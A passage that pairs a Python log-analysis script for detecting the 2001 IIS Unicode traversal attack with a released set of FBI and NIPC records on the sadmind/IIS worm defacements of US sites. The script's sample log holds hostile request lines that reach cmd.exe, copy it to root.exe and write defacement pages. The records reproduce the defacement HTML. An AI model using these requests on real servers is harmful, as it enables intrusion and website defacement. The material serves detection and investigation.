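SAMPLE_LOG = r"""
May 04 00:40:56.167 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR86 sent=66 rcvd=505 srcif=Vpn6 src=211.96.252.251/50598 cldst=207.109.247.150/80 svsrc=10.96.0.1/5332 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="200 OK" proto=http rule=388
May 04 00:40:57.031 quebec httpd[325]: 121 Statistics: duration=0.05 id=6uR8a sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/50600 cldst=207.109.247.150/80 svsrc=10.96.0.1/5334 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:40:57.476 quebec httpd[325]: 121 Statistics: duration=0.08 id=6uR8c sent=423 rcvd=355 srcif=Vpn6 src=211.96.252.251/50601 cldst=207.109.247.150/80 svsrc=10.96.0.1/5335 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^> result="502 Gateway Error" proto=http rule=388
May 04 00:45:12.000 quebec httpd[325]: 121 Statistics: duration=0.02 id=6uR9z sent=1204 rcvd=210 srcif=Vpn6 src=198.51.100.7/40213 cldst=207.109.247.150/80 svsrc=10.96.0.1/5400 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/default.htm result="200 OK" proto=http rule=388
"""

HEADER_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2}\.\d+) (?P<host>\S+) "
    r"(?P<proc>\S+): \d+ Statistics: (?P<fields>.*)$"
)
# key=value pairs: the value is a quoted string ("200 OK") or one token.
FIELD_RE = re.compile(r'(?:^|\s)(\w+)=("[^"]*"|\S+)')


def parse_entry(line):
    """Parse one Raptor 'Statistics' record into a dict; None if not one."""
    m = HEADER_RE.match(line.strip())
    if not m:
        return None
    entry = {"ts": m.group("ts"), "host": m.group("host")}
    for key, val in FIELD_RE.findall(m.group("fields")):
        entry[key] = val.strip('"')
    if "/" in entry.get("src", ""):
        entry["src_ip"], entry["src_port"] = entry["src"].split("/", 1)
    return entry


def has_overlong_utf8(raw):
    """True if the bytes contain a two-byte overlong UTF-8 sequence (lead
    byte 0xC0/0xC1).  %c0%af decodes to C0 AF, an illegal spelling of '/',
    which is how the traversal fixed by MS00-078 got past IIS's '..' check."""
    return any(
        raw[i] in (0xC0, 0xC1) and 0x80 <= raw[i + 1] <= 0xBF
        for i in range(len(raw) - 1)
    )


def decode_echo_payload(arg):
    """Turn a cmd.exe 'echo' argument back into the text it writes: '+' is a
    space, %XX is percent-encoding, and '^' is cmd.exe's escape for '<'/'>'.
    Returns None when the request is not an echo command."""
    query = urlsplit(arg).query
    prefix = "/c+echo+"
    if not query.startswith(prefix):
        return None
    text = unquote(query[len(prefix):].replace("+", " "))
    return text.replace("^", "")


def analyse(entry):
    """Apply the detection rules to one entry; returns the matching tags."""
    tags = []
    parts = urlsplit(entry.get("arg", ""))
    path_bytes = unquote_to_bytes(parts.path)
    query = parts.query.lower()
    # '..' climbing out of /scripts, whether spelled plainly or as overlong UTF-8
    if has_overlong_utf8(path_bytes) or b"../" in path_bytes or b"..\\" in path_bytes:
        tags.append("traversal")
    # a shell reached through the web root, with a /c command line
    if unquote(parts.path).lower().endswith(("cmd.exe", "root.exe")) and query.startswith("/c"):
        tags.append("command-execution")
    if "copy" in query and "cmd.exe" in query:
        tags.append("shell-copy-staging")   # cmd.exe copied into /scripts as root.exe
    if query.startswith("/c+echo"):
        tags.append("content-write")        # page content written via echo
    return tags


def scan(log_text):
    """Run every rule over a log excerpt; one dict per entry that matched."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_entry(line)
        if entry is None:
            continue
        tags = analyse(entry)
        if tags:
            hits.append({
                "ts": entry["ts"],
                "src_ip": entry.get("src_ip"),
                "tags": tags,
                "payload": decode_echo_payload(entry.get("arg", "")),
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src_ip"], ", ".join(hit["tags"]))
        if hit["payload"]:
            print("   writes:", hit["payload"])
```

The same rules apply unchanged to the IIS logs the other victims provided, since they key on the decoded request path and query rather than on the Raptor framing.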
Cyber Threat and Computer Intrusion
Incident Reporting Guidelines

This form may be used as a guide or vehicle for reporting cyber threat and computer intrusion incident information to the NIPC or other law enforcement organization. It is recommended that these Cyber Incident Reporting Guidelines be used when submitting a report to a local FBI Field Office.

Do NOT include CLASSIFIED information on this form unless you adhere to applicable procedures for proper marking, handling and transmission of classified information. Please contact NIPC Watch Operations Center (202) 323-3205 to arrange secure means to submit classified information.

Information concerning the identity of the reporting agency, department, company, or individual(s) will be treated on a confidential basis. If additional information is required, you will be contacted directly.

Report Date/Time: May 7, 2001 3:05PM

Point of Contact (POC) Information

[POC name and telephone redacted]
E-mail: [redacted]
State: Oregon
Zip Code: 97209

http://www.nipc.gov/incident/cirr.htm 5/7/2001
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* D 


Country: JUSA 


I ĐEN TÊN TT TP SƠ) 


Incident Information 


Name of Organization: (if same as above, enter "BAME") 


Street: jsame 


9 


121 NW Everett 
Portland Oregon 97209 


3. Date/Time and duration of incident|05/03/2001 3:46am PDT ` 


4. Is the affected system/network critical to the organization?
Yes / No


5. Critical Infrastructure sector(s) affected. (Check all that apply)
Power / Transportation / Banking and Finance / Emergency Services / Government Operations / Water Supply Systems / Gas & Oil Storage and Delivery / Other (Provide details in remarks) / Telecommunications / Not applicable


Remarks: Internet mail and fax system


05/08/2001 TUE 07:03 FAX
National Infrastructure Protection Center (NIPC) - Incident Report - Page 3 of 6
6. Nature of Problem? (Check all that apply)
Intrusion / System impairment/denial of resources / Unauthorized root access / Web site defacement / Compromise of system integrity / Hoax / Theft / Damage / Unknown / Other:


7. Has this problem been experienced before? (If yes, please explain in remarks section):
Yes / No


Remarks: No Remarks


8. Suspect method of intrusion/attack
Virus (provide name if known) / Vulnerability exploited (explain) / Denial of Service / Trojan horse / Distributed Denial of Service / Trapdoor / Unknown / Other (Provide details in remarks)


Remarks: Hacker exploited the identified problem with Microsoft IIS on hotfix MS00-078 that allows a malicious hacker to run programs on the web


9. Suspect perpetrator(s) or possible motivation(s) of the attack
Insider/Disgruntled employee / Former employee / Competitor / Other (Explain in remarks) / Unknown


Remarks: This appears to be an attack from the Chinese mainland on our website.


11. Evidence of spoofing?
Yes / No / Unknown
12. What computers/systems (hardware and software) were affected? (Operating system, version):
Unix / OS/2 / Linux / VAX/VMS / NT / Windows / Sun OS/Solaris / Other (Provide details in remarks)


Remarks: No Remarks


13. Security Infrastructure in place. (Check all that apply)
Incident/Emergency Response Team / Encryption / Firewall / Secure Remote Access/Authorization tools / Intrusion Detection System / Banners / Security Auditing Tools / Access Control Lists / Packet filtering
14. Did the intrusion/attack result in a loss/compromise of sensitive, classified or proprietary information?
Yes (Provide details in remarks) / No / Unknown


Remarks: It does not appear at this time that the attack was for anything other than to deface the site.


15. Did the intrusion/attack result in damage to system(s) or data?
Yes (Provide details in remarks) / No


Remarks: other than the replacement of the affected web pages.


16. What actions and technical mitigation have been taken?
System(s) disconnected from the network / System Binaries checked / Other (Please provide details in remarks) / Log files examined / No action(s) / Backup of affected system(s)


Remarks: All relevant hot fixes to the server are being installed at this time.


17. Has the local FBI field office been informed?
Yes (Which Office) / No


18. Has another agency/organization been informed? If so, please provide name and phone number.
Yes / No


State/local police:


Other (Incident Response, law enforcement, etc.)


19. When was the last time your system was modified or updated?


Date: approximately 4/29/2001
Company/Organization that did work (Address, phone, POC information):


20. Is the System Administrator a contractor?
Yes (Provide POC Information) / No


21. In addition to being used for law enforcement or national security purposes, the intrusion-related information I reported may be shared with:


The Public / InfraGard Members with Secure Access


22. Additional Remarks: (Please limit to 500 characters. Amplifying information may be submitted separately.)


The attack involved changing four files on the internet server in approximately seven different directories (default.htm, default.asp, index.htm, and index.asp). The files were written with the following text:


FUCK USA Government
FUCK PoizonBox
contact:sysadmcn@yahoo.com.cn




If the reported incident is determined to be a criminal matter you may be contacted by an agent for 
additional information. 


b6
b7C


From: [redacted]
Sent: Monday, May 14, 2001 2:20 PM
To:
Subject: China web defacement request


Attachments: alert.txt default.htm In010508.log index.htm


[ ] here are the files you requested for the China attack. The log is an IIS log file that shows the actual process they used in the attack.


<<alert.txt>> <<default.htm>> <<in010503.log>> <<alert.txt>> <<index.htm>>


Port of Portland


b6
b7C


alert.txt
Network Associates GroupShield Exchange
******** Alert generated at: Monday, May 14, 2001 02:19:57 PM Pacific Daylight Time ********


The file default.asp has been replaced.
Please consult your administrator for further help
and remember to quote your ticket number: 0A3_989875197_PORTEX1
fuck USA Government
fuck PoizonBOx


contact:sysadmcn@yahoo.com.cn


FW: Cyber Incident Report Form Page 1 of 2
From: [redacted] b6
b7C

To:

Cc:

Subject: FW: Cyber Incident Report Form

Sent: 5/9/01 3:36 PM Importance: Normal
From: [redacted] b6
Sent: Wednesday, May 09, 2001 3:35 PM b7C


To: 'nipc.watch@fbi.gov'
Subject: Cyber Incident Report Form


Report date time=


Name=[redacted] b6
Telephone Fax Number=503-988-3749 ext [redacted]

Email=

Organization=Multnomah County ISD

Addrs Street=4747 E. Burnside St

City=Portland

State=OR

Zip Code=97215

Country=USA

Question1 Organization=SAME


Question1 Contact Info=[redacted] b6


Question1 Tele Number=503-988-3749 ext [redacted] b7C
Question1 Street=SAME

Question1 City State Zipcd=SAME

Question1 Country=SAME


Question1 Email=SAME

Question2 Location=4747 E. Burnside St
Portland, OR 97215

ISD Data Center


Question3 Date Time=05/06/01 12:36:08.683 -14:35:03:975
Question4 Critical=Yes
Question5 crit infrasture=Government Operations
Question5_Remarks=No Remarks

Question6 nature of prob=Web site defacement

Question6 other=

Question7 exp problem=No

Question7 Remarks=No Remarks

Question8 method of attack=Vulnerability exploited




Question8 method of attack=Other

Question8 Remarks=A fast spreading worm called sadmind/IIS Worm, documented at CERT on May 8th.

http://www.cert.org/advisories/CA-2001-11.html
Question9_sus_perpetrators=Other

Question9_Remarks=Chinese hacker/s making political anti USA statements. At this time we do not feel that we were specifically targeted.
Question10_ip_addrs=211.75.85.1

Question11_evid_of_spoof=Unknown

Question12 oper systems=NT

Question12 oper systems=Other

Question12_Remarks=and Windows 2000. A total of four known systems were successfully attacked.

Question13 security infrasture=Firewall
Question13 security infrasture=Intrusion Detection System
Question13 security infrasture=Packet filtering
Question14 attack loss info=Unknown

Question14_Remarks=No Remarks

Question15 damage systms=Yes

Question15_Remarks=default webpages were overwritten
Question16 what actions=Other

Question16 what actions=Log files examined

Question16_Remarks=All Chinese source IP addresses are being denied access at the firewall. All but one of the affected webservers have been patched to prevent this in the future.

Question17 fieldoff inform=Yes

Question17 Field Office=Portland Oregon

Question18 agency inform=No

Question18 State local Police=

Question18 Inspector General=

Question18_CERT-CC=

Question18 FedCIRC=

Question18 JTF-CND=

Question18 Other=

Question19 date of last update=

Question19 org work update=

Question20 POC Information=

Question20 sys adm contract=No

Question21 remarks=We have repaired three of the four affected servers. One server that belongs to the Multnomah County Sheriffs office has been left intact for forensic purposes. We have yet to get in touch with [redacted] of the FBI to discuss further what needs to be done. We did contact [redacted] and he said that we should at least fill out this form.


b6
b7C


b7E
May 09 01 03:25p Union Baker ESD (541) 962-0782 p.1


Organization: FBI-Portland Attention: [redacted] Re:


Fax: (503) 615-6625
Date: May 9, 2001
Subject: Web Site Hacking

Pages: 12, Including this page


Union Baker Education Service District
10100 McAlister Road
Island City, OR 97850
Office: (541) 963-4106
Fax: (541) 963-7256


May 09 01 03:25p Union Baker ESD (541)962-0782


[NeoTrace screenshot: trace to 24.218.88.40; the hop-by-hop map is illegible in the scan]


Node 23 of 23
Name: luv2golf.ne.mediaone.net
IP Address: 24.218.88.40
Geographic location unknown.
Network: ServiceCo LLC - Road Runner (NET-ROAD-RUNNER...)


Registrant:
Media 1 (MEDIAONE2-DOM)
High Speed Data
9785 Maroon Circle
Suite 420
Englewood, CO 80138
US
[NeoTrace screenshot: trace to 200.54.165.122; the hop-by-hop map is illegible in the scan]


Node 28 of 28
Name: 165-122.leased.cust.tie.cl


IP Address: 200.54.165.122


Location: 33.500S, 70.550W
Network: Universidad del Mar (NETBLK-NET-BLK-UMAR)
No match for domain tie.cl.
163.41.177 [1]


<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>
NeoTrace Trace Results
Target: 24.218.88.40
Date: Tue May 08 15:29:55 2001
Nodes: 22
(An error occurred when saving the map image)
[Node Data and Packet Data tables for the 22-hop trace: illegible in the scan]


b6
b7C
Network Data 

Network id#:1 


University of Oregon (NET-UOFORESEARPK) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:2 


Oregon Exchange (NETBLK-OREGON-EXCH) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:3 


Cable & Wireless USA (NETBLK-CW-BACKBONE) 
9000 Regency Parkway, Suite 200 
Cary, NC 27511 
US 


Network id#:4 


Cable & Wireless USA (NETBLK-CW-OSBLK) 
9000 Regency Parkway, Suite 200 
Cary, NC 27511 
US 


Network id#:5 


AT&T Data Communications Services (NETBLK-ATT) 
5000 Hadley Road 
South Plainfield, NJ 07080 
US 


Network id#:6 


AT&T ITS (NET-ATT) 
200 Laurel Avenue South 
Middletown, NJ 07748 
US


Network id#:7 


Continental Cablevision (NETBLK-CVSN-CCNE-2BL) 
Pilot House - Lewis Wharf 
Boston, MA 02110 
US


Network id#:8 
file://C:\Program%20Files\NeoTracePro\Results\TracePreview.htm 05/08/2001
ServiceCo LLC - Road Runner (NET-ROAD-RUNNER-7)
13241 Woodland Park Road 
Herndon, VA 20171 
US 


Network id#:9


ServiceCo LLC - Road Runner (NET-ROAD-RUNNER-2) 
13241 Woodland Park Road 
Herndon, VA 20171 
US 


Network id#:10


ServiceCo LLC - Road Runner (NET-ROAD-RUNNER-6) 
13241 Woodland Park Road 
Herndon, VA 20171 
US 


Whois Data 
Whois id#: 1


Registrant information not available. 
Whois id#: 2 


Registrant: 

Network for Engineering and Research in Oregon (NERO) (NERO-DOM)
101 Covell Hall
Corvallis, OR 97331 


Whois id#: 3


Registrant: 

Cable & Wireless, Inc. (CW3-DOM) 
1919 Gallows Road 
Vienna, VA 22182 


Whois id#: 4 


Registrant: 

AT&T Corp. (ATT2-DOM) 
55 Corporate Drive 
Bridgewater, NJ 08807 
US 


Whois id#: 5 

Registrant: 

EXCALIBUR Group, A Time Warner Company (RR6-DOM) 
13241 Woodland Park Rd 


Herndon, VA 20171 
US 


Whois id#: 6


Registrant: 
Media 1 (MEDIAONE2-DOM)
High Speed Data 
9785 Maroon Circle 
Suite 420 
Englewood, CO 80138 
US 


NeoTrace Copyright ©1997-2000 NeoWorx Inc.
Union Baker ESD


(541)962-0782 p.39


NeoTrace Version 3.0 Trace Results Page 1 of 4
Target: 200.54.165.122
Date: Tue May 08 15:32:26 2001
Nodes: 29
(An error occurred when saving the map image)
[Node Data and Packet Data tables for the 29-hop trace: illegible in the scan]
Network Data 
Network id#:1 


University of Oregon (NET-UOFORESEARPK) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:2 


Oregon Exchange (NETBLK-OREGON-EXCH) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:3 


UUNET Technologies, Inc. (NET-UUNETCUSTB40) 
3060 Williams Drive 
Fairfax, VA 22031 
US 


Network id#:4 


UUNET Technologies, Inc. (NET-UUNET-) 
3060 Williams Drive 
Fairfax, VA 22031 
US 


Network id#:5 


Teleglobe Inc. (NETBLK-GLOBEINTERNET2)
1000, rue de La Gauchetiere ouest 
Montreal, QC H3B 4X5
CA 


Network id#:6 


Telefonica Data S.A. 
C/ Francisco Silvela, 42 
Madrid 28028 
SPAIN 


Network id#:7 


Telefonica Mundo (NETBLK-PROV-2001) 
Exequiel Fernandez 5660 
Santiago, 

CL 


Network id#:8 


Telefonica Empresas (NETBLK-ISP-EMPRESAS) 
Bandera 162 Piso 7 
Santiago, 00 
CL


Network id#:9 


Universidad del Mar (NETBLK-NET-BLK-UMAR) 
Amunategui 1838 Recreo 
Vina del Mar, 00 
CL 


Whois Data 
Whois id#: 1


Registrant information not available.
Whois id#: 2


Registrant: 

Network for Engineering and Research in Oregon (NERO) (NERO-DOM)
101 Covell Hall
Corvallis, OR 97331 


Whois id#: 3


Registrant: 

UUNET Technologies, Inc. (ALTER-DOM) 
3060 Williams Drive 
Falls Church, VA 22031 
USA 


Whois id#: 4 


Registrant: 
Teleglobe Canada Inc. (TELEGLOBE2-DOM) 
1000, rue de la Gauchetiere ouest
Montreal, QC H3B 4X5
CANADA


Whois id#: 5 

Registrant: 

Telefonica S.A. (TELEFONICA-DATA2-DOM) 
Gran Via, 28 


Madrid, M E-20013 
ES 


NeoTrace Copyright ©1997-2000 NeoWorx Inc.
Logs from NT box that was defaced


E:
PKZIP (Compressed)
files


Here are the logs and web pages that we found as well as the contents of the scripts dir. The logs here are from our special ed database server (a Dell PowerEdge) and it has only had IIS reinstalled and the inetpub directory erased.


As to the other box that was defaced, it has been completely reformatted and restored from tape backup. There were 2 dirs of logs, both are in there... I have them on floppy as well.


There is also evidence in the logs of the other break-in that we had but that was stopped and was an abuse of an anonymous FTP account that was active and had write access... it was used to store and distribute stolen software like games and programs before they were released in stores.


b6
Union Baker ESD b7C


10100 N McAlister Road
Island City, OR 97850
phone 541-963-4106
fax 541-962-0782


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/06/2001
To: Chicago


From: Chicago
Squad IP/C


Contact: SA [redacted]
Approved By:
Drafted By:


Case ID #: [redacted] (Pending)


Title: Subject: Hacker/Honker Union of China


Victim: Illinois Secretary of State
Type: Intrusion
Date: 04/03/2001


Synopsis: To open sub file for the above captioned case.


Details: Due to the amount of e-mail generated by the above captioned case it is requested that the following sub file be created: [redacted]


b7E


++


b3
b7E


(Rev. 08-28-2000)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/16/2001


To: Counterterrorism Attn: NIPC, CIU, SSA [redacted] b3
Chicago SA [redacted]


From: Cleveland
Squad 16


Contact: SA [redacted] (216) 622-6917


Approved By:


Drafted By:


Case ID #: [redacted] (Pending)


Title: UNSUB(S), CHINA;
SOUTHWEST GENERAL HOSPITAL, CLEVELAND, OH;
BETHUNE COOKMAN COLLEGE, DAYTONA BEACH, FL;
COMPUTER INTRUSIONS


Synopsis: To report complaints received at Cleveland Division re: victims of SADMIND/IIS worm originating from China.


Enclosure(s): One FD-340 containing evidence from Southwest General Hospital; One FD-340 containing evidence from Bethune Cookman College.


b6
b7C


Details: On 05/08/2001, [redacted], Southwest General Hospital (SGH), [redacted], Middleburg Heights, OH, work telephone number [redacted], telephonically advised as follows:


On 05/06/2001, at approximately 08:31am, the home page on SGH's external E-mail server, mail.swgeneral.com, IP address 206.69.0.3, was replaced with a page declaring "fuck the U.S." and "fuck poizon box." The replaced home page also contained the E-mail address of sysadmcn@yahoo.com.cn. The victim machine was a Compaq, running MS Windows NT Server v4.0, Service Pack 5, and MS Internet Information Server (IIS) v4.0. The victim machine also runs MS Exchange and is primarily used as an external E-mail Server. The SGH firewall, a WatchGuard Firebox II, IP address 206.69.0.2, registered scanning activity around the time of the intrusion, originating from IP addresses 208.152.233.2; 211.100.10.158; and, 211.23.21.254. IP address 208.152.233.2 is registered to Bethune Cookman College, Daytona Beach, FL. IP address 211.100.10.158 is registered to a contact in China. IP address 211.23.21.254 is registered to a contact in Taiwan.




The enclosed FD-340 contains a floppy diskette containing the following files: logcopy.txt (firewall log); index.htm (installed by hacker); index.asp (installed by hacker); default.htm (installed by hacker); and, default.asp (installed by hacker). The hacker files were found in the following directories: /iis/samples; /ipnetpub; c:/; /scripts; and, /wwwroot.


[redacted] has incurred a financial loss of $480, based on man hours. SGH's external E-mail server was unavailable and offline for approximately 30 hours. [redacted] installed MS Windows NT Server v4.0 Service Pack 6a after the incident.
b6
b7C


On 05/08/2001, writer telephonically contacted [redacted], Bethune Cookman College (BCC), Daytona Beach, FL, work telephone number (904)255-1401. [redacted] advised as follows:

On 05/05/2001 at approximately 10:00am - 11:00am, and on 05/08/2001 at approximately 07:00am - 08:00am, three computers, running Solaris v2.6, at BCC were compromised by the SADMIND/IIS worm. One machine was the DNS server and the two other machines were workstations. The hacker installed a file called uni.tar which was extracted (and later removed) in directory /dev/cuc. The script modified file s71rpc located in directory /rc2.d. The script performed Internet scans for computers running IIS. The scan results were stored in /dev/cuc.


To date, BCC has incurred a financial loss of approximately $1,000, based on man hours recovering from this incident. The enclosed FD-340 contains a floppy diskette containing a file called worm.tar (evidence found on victim machines).


Cleveland Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 




To: Counterterrorism From: Cleveland 
Re: T 05/16/2001 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
Take action deemed appropriate. 
++ 




b3 
b7E 


(Rev. 10-01-1999)


FEDERAL BUREAU OF INVESTIGATION 




Precedence: ROUTINE Date: 05/16/2001 


To: Chicago Attn: SA [redacted], 312/907-8680
San Diego SA [redacted], 858/499-7793


From: Mobile 
Squad 5 


Approved By: b3
b6
Drafted By: b7C
b7E


Case ID #: [redacted] (Pending)
[redacted] (Pending)


[redacted] (Pending)


Title:  HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
COMPUTER INTRUSION; 
04/30/2001 


HONKER UNION OF CHINA;

CALIFORNIA BAJA INTERNET SERVICE - VICTIM;
INTRUSION - INFORMATION SYSTEMS


Synopsis: Provide information re above captioned cases to 
Chicago and San Diego. 


Enclosure(s): Enclosed for Chicago are the [illegible] copy of the three FD-302's regarding interviews with [redacted] of Bay Networking Technology, [redacted] of OnLine Information Systems, and [redacted] of The-Store.com. 6 1A envelopes containing the following: original interview notes of the previously listed interviewees (3), a CD-ROM containing computer log files from the compromised Windows NT server at Bay Networking Technology, 2 CD-ROM's and 1 floppy disk containing log files from the compromised NT Server at OLIS, and computer log files provided by The-Store.com.
b6
b7C


Enclosed for San Diego is a copy of the three FD-302's regarding interviews with [redacted] of Bay Networking Technology, [redacted] of OnLine Information Systems, and [redacted] of The-Store.com.
b6
b7C


Details: Mobile interviewed the following persons regarding the above captioned investigations: [redacted]


b7E




b6
b7C
b7E


Further questions should be directed to SA [redacted], 34/415-3209.




LEAD(s):
Set Lead 1: 
CHICAGO 
AT CHICAGO, ILLINOIS 


Utilize enclosed information as necessary for above 
captioned investigation at Chicago. 


Set Lead 2: 
SAN DIEGO 
AT SAN DIEGO, CALIFORNIA 
Information enclosed for informational purposes regarding above captioned investigations. Utilize information as necessary for investigation at San Diego.


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/09/2001
To: Memphis Attn: Squad 5
SSA [redacted]
SA [redacted]
From: Chicago
Squad IP/C
Contact: SA [redacted] 312/786-3918


Approved By:


Drafted By:

Case ID #: [redacted]

Title: Subject: Hacker/Honker Union of China
Victim: Illinois Secretary of State
Type: Intrusion
Date: 04/03/2001


Synopsis: To set lead for Memphis Division.


Administrative: Reference telephone call between SA [redacted] and SA [redacted] on May 8, 2001.


Details: Chicago Division is the lead office for the criminal investigation of the Honkers Union of China, sometimes called the Hackers Union of China, specifically, actions against United States Web sites originating out of China.


Many of the attacks have taken the form of Web page defacements.


On May 8, 2001, [redacted] contacted SA [redacted] to inform that one of First Tennessee Bank's Web sites, www.ftcm.com, had been the victim of a Web site defacement. The statement on the Web site, "fuck USA Government fuck PoisonBOx contact:sysadmin@yahoo.com.cn", is a common statement seen on many of the defacements.


Other victims of this defacement have traced the IPs back to the People's Republic of China.


b3
b6
b7C
b7E


LEAD(s): 
Set Lead 1: 
MEMPHIS 


AT MEMPHIS, TN 


b6


It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD-302s regarding the defacements and
log files, and forward all information to SA [redacted].


++ 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001
To: New York Attn: NIPC Squad
SA [redacted]
b6
From: Chicago b7C
Squad IP/C b7E


Contact: SA [redacted] 312/786-3918
Approved By:
Drafted By:
Case ID #: [redacted]


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for New York Division, NIPC Squad, SA [redacted]
b6


b7C
Administrative: Reference telephone call between SA [redacted] and SA [redacted] on May 7, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 7, 2001, SA [redacted] contacted SA [redacted] to b6
inform that New York Division was receiving numerous complaints b7C
regarding Web site defacements originating from IP addresses in 
China with derogatory statements toward the United States. Many 
of the sites contained the following statement, "fuck USA 
Government fuck PoisonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 




LEAD(s): 
Set Lead 1: 
NEW YORK 


AT NEW YORK, NY 


It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD-302s regarding the defacements and
log files, and forward all information to SA [redacted].
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 05/05/2001
To: All Divisions Attn: NIPC Squads
Counter Terrorism Computer Investigations Unit
CIOJ NIPC, Room 5965
SSA [redacted]
Chicago ASAC [redacted]
SSA [redacted]
SA [redacted]
From: Chicago
Squad IP/C
Contact: SA [redacted] 312/786-3918


Approved By:
Drafted By:
Case ID #: [redacted] (Pending)


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To canvass all divisions for information concerning the
Honkers Union of China or Hackers Union of China.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. Also, as a part of 
this investigation, United States based groups carrying out 
actions against Web sites originating out of China are being 
investigated. 


The attacks have taken the form of denial of service 
attacks, installation of the Adore worm and Web page defacements. 
Attacks have been reported in Chicago, Washington, D.C., San 
Francisco, and Portland, Oregon. 


All receiving divisions are requested to canvass 
appropriate sources for information regarding any of the 
activities detailed above. Any positive information should be 
forwarded to Chicago Division, Squad IP/C, SA [redacted]. 
To: All Divisions From: Chicago 




LEAD(s): 
Set Lead 1: 
ALL RECEIVING OFFICES 


It is requested that all receiving offices canvass 
sources for information regarding the above detailed activities 
and report any positive information to Chicago Division, Squad 
IP/C, SA [redacted], telephone number 312/786-3918. 


++ 
05/21/01 
16:51:45 


Case ID: 
Serial: 


Set to: ADMINISTRATIVE SERVICES 


Lead Upload Report 


ALBANY 
ALBUQUERQUE 
ALMATY 

AMMAN 

ANCHORAGE 

ANKARA 

ATHENS 

ATLANTA 

BALTIMORE 

BANGKOK 

BERLIN 

BERN 

BICS 

BIRMINGHAM 
BOGOTA 

BOSTON 

BRASILIA 
BRIDGETOWN 
BRUSSELS 
BUCHAREST 

BUENOS AIRES 
BUFFALO 

BUTTE ITC 

CAIRO 

CANBERRA 

CARACAS 

CHARLOTTE 
CINCINNATI 
CLEVELAND 
COLUMBIA 
COPENHAGEN 
COUNTERTERRORISM 
CRIM JUSTICE INFO SVCS 
CRIMINAL INVESTIGATIVE 
CRIT INCIDENT RESPONSE 
DALLAS 

DENVER 

DETROIT 
DIRECTOR'S OFFICE 
EL PASO 

EL PASO INT CENTER 
FINANCE 

FORT MONMOUTH ITC 
GENERAL COUNSEL 
HONG KONG 
HONOLULU 

HOUSTON 




INDIANAPOLIS 
INFORMATION RESOURCES 
INSPECTION 
INVESTIGATIVE SERVICES 
ISLAMABAD 
JACKSON 
JACKSONVILLE 
KANSAS CITY 
KIEV 
KNOXVILLE 
LABORATORY 
LAGOS 

LAS VEGAS 
LITTLE ROCK 
LONDON 

LOS ANGELES 
LOUISVILLE 
MADRID 

MANILA 
MEMPHIS 
MEXICO CITY 
MIAMI 
MILWAUKEE 
MINNEAPOLIS 
MOBILE 

MOSCOW 
NAIROBI 
NATIONAL SECURITY 
NEW DELHI 

NEW HAVEN 
NEW ORLEANS 
NEW YORK 
NEWARK 
NORFOLK 
OKLAHOMA CITY 
OMAHA 

OTTAWA 

PANAMA CITY 
PARIS 
PHILADELPHIA 
PHOENIX 
PITTSBURGH 
POCATELLO ITC 
PORTLAND 
PRAGUE 
PRETORIA 
RICHMOND 
RIYADH 




Set to: ROME 
SACRAMENTO 
SALT LAKE CITY 
SAN ANTONIO 
SAN DIEGO 
SAN FRANCISCO 
SAN JUAN 
SANTIAGO 
SANTO DOMINGO 
SAVANNAH ITC 
SEATTLE 
SEOUL 
SINGAPORE 
SPRINGFIELD 
ST LOUIS 
TAIPEI 
TALLINN 
TAMPA 


*** Unable to be set. *** 
Reason: 
Set to office invalid. 
OFFICE: TECHNICAL SERVICES 


Set to: TEL AVIV 
TOKYO 
TRAINING 
VIENNA 
WARSAW 
WASHINGTON FIELD 
